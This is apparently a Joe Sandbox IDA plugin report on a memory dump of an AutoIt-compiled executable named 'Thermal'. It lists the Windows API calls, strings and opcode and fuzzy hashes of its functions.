                                                • Instruction ID: fe9b65077d22144cf393183ad7111cc3f8b246d4a075470dd2cede177e54f65b
                                                • Opcode Fuzzy Hash: f80ed61e25e24294345b844a23acc874c353e5b8ebf254739afdfcf3e26d2027
                                                • Instruction Fuzzy Hash: 464193B1048304EAD321FB60DC49FDF77ECAF84350F504A1EF195921A2EB78A649CB96
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
                                                • ShowWindow.USER32(00000000), ref: 0078513E
                                                • ShowWindow.USER32(00000000), ref: 00785147
                                                Strings
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                • Instruction ID: 448877307bab512a9c848268561ac21fb5d33204806bd9a172e5802d15e852d7
                                                • Opcode Fuzzy Hash: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
                                                • Instruction Fuzzy Hash: 21F03AB06442947EEA7117276C08F372EBDF7C6F20F00041AB900A22B1CA655840DEB0
                                                APIs
                                                  • Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
                                                  • Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4
                                                • _free.LIBCMT ref: 007D9C5F
                                                • _free.LIBCMT ref: 007D9C66
                                                • _free.LIBCMT ref: 007D9CD1
                                                  • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                  • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                • _free.LIBCMT ref: 007D9CD9
                                                Strings
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 1552873950-2806939583
                                                • Opcode ID: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                • Instruction ID: bcacbddf0976f39138d6e6cb0fc9a4de801c241592e2e32aec5cdf969efdd23d
                                                • Opcode Fuzzy Hash: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
                                                • Instruction Fuzzy Hash: E15149B1904219EFDF24EF64DC85AAEBBB9FF48304F00409EB249A7341DB755A808F59
                                                APIs
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                • Instruction ID: 72093f9a23a7f21224305384438e78ba48d8c6feb7d0fcc2392439768f63b933
                                                • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                • Instruction Fuzzy Hash: 2C51D430A00B25DBDF268FB9E88466E77B6EF41720F24872DF835962D0D7789E509B40
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077534A
                                                • TranslateMessage.USER32(?), ref: 00775356
                                                • DispatchMessageW.USER32(?), ref: 00775360
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                • Instruction ID: 3e3594d673c05dc2df3ff617d0222038a8820727a8f458930f12ea4b350b6331
                                                • Opcode Fuzzy Hash: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
                                                • Instruction Fuzzy Hash: 4931F670508B059EEF308B64DC48BBA37A8BB82388F148569E42B971F1D7FDD845E711
                                                APIs
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                  • Part of subcall function 007907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                  • Part of subcall function 0078FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077AC6B), ref: 0078FFA7
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077AD08
                                                • OleInitialize.OLE32(00000000), ref: 0077AD85
                                                • CloseHandle.KERNEL32(00000000), ref: 007B2F56
                                                Strings
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: pg
                                                • API String ID: 1986988660-3979489971
                                                • Opcode ID: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                • Instruction ID: 8150bfc902fd9bbe208aeb21053630e7e8963b1921fd4feb30e29d220c70c508
                                                • Opcode Fuzzy Hash: bfc73c9ad537bbf1444434a3ad05d844a29ff1cf2771de21db9ca2338bf2c60a
                                                • Instruction Fuzzy Hash: B281CAF0909284CED3A8EF69AC496557FE8FBD8304B40896AD558C7372E774E408DF98
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712A8
                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712C9
                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712EB
                                                Strings
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                • Instruction ID: 3ada228c7bf1c8f4b1e4da7620f027b32513af0078e816bbdcc49e1f9cbb2d6f
                                                • Opcode Fuzzy Hash: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
                                                • Instruction Fuzzy Hash: 33111575610208BFDF208FA8DC84EEEBBACFF05781F508569E809D7210E6759E449BA4
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00802C4C), ref: 007D3F57
                                                • GetLastError.KERNEL32 ref: 007D3F66
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D3F75
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00802C4C), ref: 007D3FD2
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: 5b4c7cd752e06c403d309ae230ff84e51cbd5fd59c79f1b21bed6f4dcf63c47a
                                                • Instruction ID: 669b14306ef85362865dbe879f77026de6f6fd4fd5d63020372000b0295a3010
                                                • Opcode Fuzzy Hash: 5b4c7cd752e06c403d309ae230ff84e51cbd5fd59c79f1b21bed6f4dcf63c47a
                                                • Instruction Fuzzy Hash: 8B219F709482059FC710EF28D88586AB7F8FE59364F104A1EF4A5C73A1DB34DA4ACB53
                                                APIs
                                                • _memset.LIBCMT ref: 00785B58
                                                  • Part of subcall function 007856F8: _memset.LIBCMT ref: 00785787
                                                  • Part of subcall function 007856F8: _wcscpy.LIBCMT ref: 007857DB
                                                  • Part of subcall function 007856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                • KillTimer.USER32(?,00000001,?,?), ref: 00785BAD
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00785BBC
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C0D7C
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                • Instruction ID: 1c6cb560f312ff44c77265eaccedf7eb84ca21f360b07dbddde63f9df895766b
                                                • Opcode Fuzzy Hash: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
                                                • Instruction Fuzzy Hash: C221DAB0544B84EFEB739B64C895FEBBFECAF11314F04048DE69A56141C3786A84CB91
                                                APIs
                                                  • Part of subcall function 007849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                • _free.LIBCMT ref: 007BFB04
                                                • _free.LIBCMT ref: 007BFB4B
                                                  • Part of subcall function 007829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
                                                Strings
                                                • Bad directive syntax error, xrefs: 007BFB33
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: Bad directive syntax error
                                                • API String ID: 2861923089-2118420937
                                                • Opcode ID: 603d086d9c0ca77d5be608ac3f28ec65de0c28dc5c592aa9efe4beebff97ff01
                                                • Instruction ID: 6b30583d3572ebd7f098fb14bd01a3caf358c98a732732d0325265769341578e
                                                • Opcode Fuzzy Hash: 603d086d9c0ca77d5be608ac3f28ec65de0c28dc5c592aa9efe4beebff97ff01
                                                • Instruction Fuzzy Hash: BD914E71950219EFCF18EFA8CC55AEDB7B4FF05710F14852AF815AB291EB38A905CB50
                                                APIs
                                                  • Part of subcall function 00784AB2: __fread_nolock.LIBCMT ref: 00784AD0
                                                • _wcscmp.LIBCMT ref: 007D9DE1
                                                • _wcscmp.LIBCMT ref: 007D9DF4
                                                Strings
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                • Instruction ID: e152e9df3fca6ca2450634e3d1d566c437a9cd4aeae447c6c4c8823e0cf7f848
                                                • Opcode Fuzzy Hash: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
                                                • Instruction Fuzzy Hash: D841D972A4021AFADF21EAE4CC49FDF7BBDEF45710F00446AFA00BB281D67999448765
                                                APIs
                                                • _memset.LIBCMT ref: 007C032B
                                                • GetOpenFileNameW.COMDLG32(?), ref: 007C0375
                                                  • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                  • Part of subcall function 007909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                Strings
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                • Instruction ID: 5bcf1942f814b1a1f9a3d16a1b6b64fd76271beba51ec41e40585f88dcddd953
                                                • Opcode Fuzzy Hash: 3e8675e6d6b8338c15139361ac044abaa6204b00413a5a84d70eb1ef96013dbc
                                                • Instruction Fuzzy Hash: 04218171A142989BDF41DFD8D849BEE7BFCAF49710F00405AE504E7241DBB85A89CFA1
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                • _memset.LIBCMT ref: 007859F9
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00785A9E
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00785ABB
                                                Similarity
                                                • API ID: IconNotifyShell_$_memset
                                                • String ID:
                                                • API String ID: 1505330794-0
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3C2
                                                  • Part of subcall function 0079A39B: __NMSG_WRITE.LIBCMT ref: 0079A3CC
                                                • __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079A3F8: GetModuleFileNameW.KERNEL32(00000000,008353BA,00000104,00000004,00000001,00791003), ref: 0079A48A
                                                  • Part of subcall function 0079A3F8: ___crtMessageBoxW.LIBCMT ref: 0079A538
                                                  • Part of subcall function 007932CF: ___crtCorExitProcess.LIBCMT ref: 007932D5
                                                  • Part of subcall function 007932CF: ExitProcess.KERNEL32 ref: 007932DE
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                APIs
                                                • _free.LIBCMT ref: 007D92D6
                                                  • Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
                                                  • Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB
                                                • _free.LIBCMT ref: 007D92E7
                                                • _free.LIBCMT ref: 007D92F9
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: EA06
                                                • API String ID: 4104443479-3962188686
                                                APIs
                                                • _strcat.LIBCMT ref: 007EE20C
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                • _wcscpy.LIBCMT ref: 007EE29B
                                                Similarity
                                                • API ID: __itow__swprintf_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1012013722-0
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00785FEF
                                                  • Part of subcall function 0079359C: __lock.LIBCMT ref: 007935A2
                                                  • Part of subcall function 0079359C: DecodePointer.KERNEL32(00000001,?,00786004,007C8892), ref: 007935AE
                                                  • Part of subcall function 0079359C: EncodePointer.KERNEL32(?,?,00786004,007C8892), ref: 007935B9
                                                  • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00785F18
                                                  • Part of subcall function 00785F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00785F2D
                                                  • Part of subcall function 00785240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
                                                  • Part of subcall function 00785240: IsDebuggerPresent.KERNEL32 ref: 0078527E
                                                  • Part of subcall function 00785240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 007852E6
                                                  • Part of subcall function 00785240: SetCurrentDirectoryW.KERNEL32(?), ref: 00785366
                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0078602F
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00783E72,?,?,?,00000000), ref: 00784327
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00783E72,?,?,?,00000000), ref: 007C0717
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                APIs
                                                  • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                • std::exception::exception.LIBCMT ref: 0079101C
                                                • __CxxThrowException@8.LIBCMT ref: 00791031
                                                  • Part of subcall function 007987CB: RaiseException.KERNEL32(?,?,?,0082CAF8,?,?,?,?,?,00791036,?,0082CAF8,?,00000001), ref: 00798820
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                APIs
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                • __lock_file.LIBCMT ref: 0079560B
                                                  • Part of subcall function 00796E3E: __lock.LIBCMT ref: 00796E61
                                                • __fclose_nolock.LIBCMT ref: 00795616
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                APIs
                                                • __lock_file.LIBCMT ref: 00795EB4
                                                • __ftell_nolock.LIBCMT ref: 00795EBF
                                                  • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                • Instruction ID: abbe48f266128d07d0976ffe789939bf475f191d7b64b04898c8bfa913e99399
                                                • Opcode Fuzzy Hash: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
                                                • Instruction Fuzzy Hash: D6F0A771911625DADF41BB74A80B75E76906F02331F254307B424EF1C2CF7C4A419B56
                                                APIs
                                                • _memset.LIBCMT ref: 00785AEF
                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00785B1F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset
                                                • String ID:
                                                • API String ID: 928536360-0
                                                • Opcode ID: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                • Instruction ID: be90293254a7d2af330554e219f162d4de28543c40f2f41ad0324293daa26d2f
                                                • Opcode Fuzzy Hash: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
                                                • Instruction Fuzzy Hash: 91F0A7B08083089FE7A2DB64DC497967BBCA70030CF0001E9AA4996292DB754B88CF55
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseHandleSleep
                                                • String ID:
                                                • API String ID: 252777609-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: ef3d6b4960996536f0d07e7bad0402ac624b6314dbb6f99fe93a4306aea7e510
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 3A31C371A10109DFDB18EF58E484969F7A6FF59300B648AA5E40ACB351EB35EEC1CBC0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LoadString$__swprintf
                                                • String ID:
                                                • API String ID: 207118244-0
                                                • Opcode ID: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                • Instruction ID: aedd52b19fa8d92a019576a2491c72e232eb3c6bdb0e47725fee543169f72d2a
                                                • Opcode Fuzzy Hash: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                • Instruction Fuzzy Hash: 55B19F34A0114ADFCF15EF99C885DEEBBB5FF48710F20801AF915A7291EB34A952CB90
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a19e1c23469083c24a2ceb1a28d1b0a3e5065c468ec333b5bd1eea6ae7445a7e
                                                • Instruction ID: e03d288d90b7f519a387dbe0a5689443e81c6aff60c7f6127db96fe806a2149b
                                                • Opcode Fuzzy Hash: a19e1c23469083c24a2ceb1a28d1b0a3e5065c468ec333b5bd1eea6ae7445a7e
                                                • Instruction Fuzzy Hash: 7261C070600206EFEF10DF54C885A7EB7E5EF84380F118129E91A8B292D778ED91CB52
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb699751b3968d74e82e32ae457cb4231f02d562db1edf85f4ccf2dc31bc1e29
                                                • Instruction ID: b456d766b7263dc2bc355ab2f3124d431e4e8372955fe99a5d7557e22007e248
                                                • Opcode Fuzzy Hash: bb699751b3968d74e82e32ae457cb4231f02d562db1edf85f4ccf2dc31bc1e29
                                                • Instruction Fuzzy Hash: 06515D35600604DBCF24FB68C999FAE77B6AF45750F148158F91AAB392CB38ED01CB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 497abb3ec12bd233acfaab1677771f994f5f36b770577b9cff50e90bcc23f6ab
                                                • Instruction ID: d17a173b5ec072b4ca1c4f49edbda41a0077fc87aa554ad5cc1466888a9670d5
                                                • Opcode Fuzzy Hash: 497abb3ec12bd233acfaab1677771f994f5f36b770577b9cff50e90bcc23f6ab
                                                • Instruction Fuzzy Hash: 3A31A075644A02DFC724EF1DD494A31F7A0FF09B10714C56DE98A8B7A1D734E991CB90
                                                APIs
                                                • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 007841B2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 13752167c977125652ba4e65d4b405237a1458521f109ed833dcbccaa9f75713
                                                • Instruction ID: 419f07d9ed73a0c3c782923c4673239523f76c11e575077712aafc2074ef6289
                                                • Opcode Fuzzy Hash: 13752167c977125652ba4e65d4b405237a1458521f109ed833dcbccaa9f75713
                                                • Instruction Fuzzy Hash: 64314D71A4071AEFCB18DF6DC888A5DB7B5FF58320F148619E81593714D7B8BDA08B90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: b4952a21e5d8c178853b77d4ccef3a0793e0ffbc52b88ee433c45d112f0a1c8e
                                                • Instruction ID: bc24208a3791647837c7237376f47020b0b91c26a2d02693d31cd53b5cc84f88
                                                • Opcode Fuzzy Hash: b4952a21e5d8c178853b77d4ccef3a0793e0ffbc52b88ee433c45d112f0a1c8e
                                                • Instruction Fuzzy Hash: F0412C74504741DFDB14DF14C498B1ABBE1BF85348F1989ACE4899B362C37AEC45CB52
                                                APIs
                                                  • Part of subcall function 00784B29: FreeLibrary.KERNEL32(00000000,?), ref: 00784B63
                                                  • Part of subcall function 0079547B: __wfsopen.LIBCMT ref: 00795486
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                  • Part of subcall function 00784ADE: FreeLibrary.KERNEL32(00000000), ref: 00784B18
                                                  • Part of subcall function 007848B0: _memmove.LIBCMT ref: 007848FA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
